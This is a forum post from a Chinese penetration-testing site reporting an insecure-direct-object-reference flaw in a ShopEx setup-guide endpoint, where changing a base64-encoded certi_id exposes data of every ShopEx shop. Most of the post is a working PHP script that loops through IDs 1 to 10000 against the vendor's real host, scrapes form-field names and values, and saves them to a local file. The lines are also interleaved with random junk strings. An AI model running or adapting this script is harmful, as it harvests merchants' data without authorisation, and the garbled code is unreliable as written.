中国网络渗透测试联盟

标题: ShopEx某接口缺陷可遍历所有用户网站 [打印本页]
作者: admin    时间: 2013-9-21 15:59
标题: ShopEx某接口缺陷可遍历所有用户网站
简要描述:
0 h% o; p  x' v5 B4 M3 lShopEx某接口缺陷,可遍历所有网站) o7 U( i( P; [; Q) {
详细说明:, p$ I2 r9 a+ C
问题出现在shopex 网店使用向导页面
: \9 T0 V* \8 U, Q4 X$ O2 \  r5 g
: l. q1 E( v" ^8 u: U! C3 U! _

0 W# V0 q4 Y( U* }" S2 A* E5 l$ u: b1 `- Hhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
3 J- H3 i3 ~+ Z- r; s1 E) B, H
+ s  @( Q, R2 A/ T) x7 v; l* c" t: @% K$ ?
5 O* |2 S) j" n& [8 A/ @2 s
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
3 D- z% G/ e2 v, e
. |9 ^2 r! i/ }+ [9 Y
5 m; d6 c2 _$ F: \: T/ r! N6 J0 C5 k1 P% T8 n
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
& o, A' v1 |& y. x3 N, s: Y- ]1 j5 _- j1 @4 w3 l9 A# y
( ^  A2 S/ d3 B% _) t- U

  B! [! J! ^' O* F, S. D<?php
- _% _! M7 n$ Z. B1 G4 T2 a& {& m4 C1 t
                for ($i=1; $i < 10000; $i++) { //遍历
0 f+ I3 b; F, P6 G8 c& Z; v" C8 G5 w
                        ShowshopExD($i);
' d* n# b" ]$ {2 B; O! Z+ w! N: G6 Y; O' k
                }
% s% p# ~0 v. Q+ }/ H1 }. M( O1 ~' g# ]6 a% \4 Q
                function ShowshopExD($cid) {
% m' _/ |% D* T3 l% I0 w' t
, y+ U" O% [) o8 b* g                $url='http://guide.ecos.shopex.cn/step2.php';
6 r) A' _5 {1 B4 g4 [4 a9 y2 o9 k# b" S# s% w  ?' l
                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
* J- t  R) K( A* ~% C3 C
+ h: t0 m2 ?1 c7 C        $url = $url.'?refer='.$refer;
. n3 M" w8 I2 l& N/ I" `7 m% j
% @1 q! q* f4 v8 s* h        $ch = curl_init($url);  ]  P6 [% q/ Z/ B
  ?  O9 k) f5 _
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
% f4 i# }9 J1 b0 R: k/ K# ]! ]+ q9 b4 ]5 T1 }  h
        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
0 a5 g0 _, W0 s% G
5 H$ ]) y6 X& K        $result = curl_exec($ch);
) k, a8 d1 g8 `4 w4 U) q$ I8 N
% E/ x- ^4 F  F% A: h1 j) K        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
" R+ R1 |# j; c0 u4 L
- d! {( M( s  `& Y, n        if(strpos($result,$refer))
, n, ^6 {, m1 j  O
8 d8 Y5 T5 d6 w! l1 e        {
/ f' d* u- E7 H2 ]2 e& d) m: w( `7 z/ b3 l: h" i- z" d
                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件  H" y7 T/ A6 T

9 C" Q1 r% ^5 }$ y                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);$ R' H2 c( ]8 Q# O* l' g& _% o! j) k
+ W" T; K! i% H  U
                foreach ($value[1] as $key) {
4 b. c, J  ]6 B* v1 d$ }0 G& z
: c1 \+ m; K3 I# ?                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);3 ]6 M6 t$ ]) Q, O  K6 i* Y" ?

0 j- F1 n$ M2 F) z$ h  v                        echo $res[1][0].':'.$res[3][0]."\r\n";
3 n9 a  G# f! O7 C. G" O- |/ L/ b1 `  ?' l# }! F; c
                        $col =$res[1][0].':'.$res[3][0]."\r\n";
4 d. G2 V! B: W- Z" s% q. D5 C, B6 ^7 l
                        fwrite($fp, $col, strlen($col)); : C2 J' b' k- B

: {- M8 s/ }: x: w                }
- d# f  k# x; M, @1 R6 f$ N9 Z3 T
                echo '--------------------------------'."\r\n";
. m$ C/ d  N- N* a! c
" \% ~+ X, Z: v# I                fclose($fp); 3 E$ q% g5 f( f, l

% w: C6 D; e4 e+ v7 I        }: i! t6 q8 k# E* [

, i' u4 [0 q8 N        flush();* j* }5 h# H( Q

9 x% `: J  E3 G" p1 c! M1 H/ m        curl_close($ch);
0 F3 J: A& u1 E9 Z" F% f$ b& C0 C0 P+ e- D& E5 v
                }' Y- y; F) I  G
% l/ P/ z& m9 D5 c" f& a- ]2 M5 y+ ?
?>
( E" r8 `$ X- \% V' _1 d漏洞证明:
. e* P7 |$ C5 O1 p# lhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg& b. h5 p! G5 C. R8 ^! s7 e
refer换成其他加密方式* m: p7 R4 F: s# P4 }% b9 C, u




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2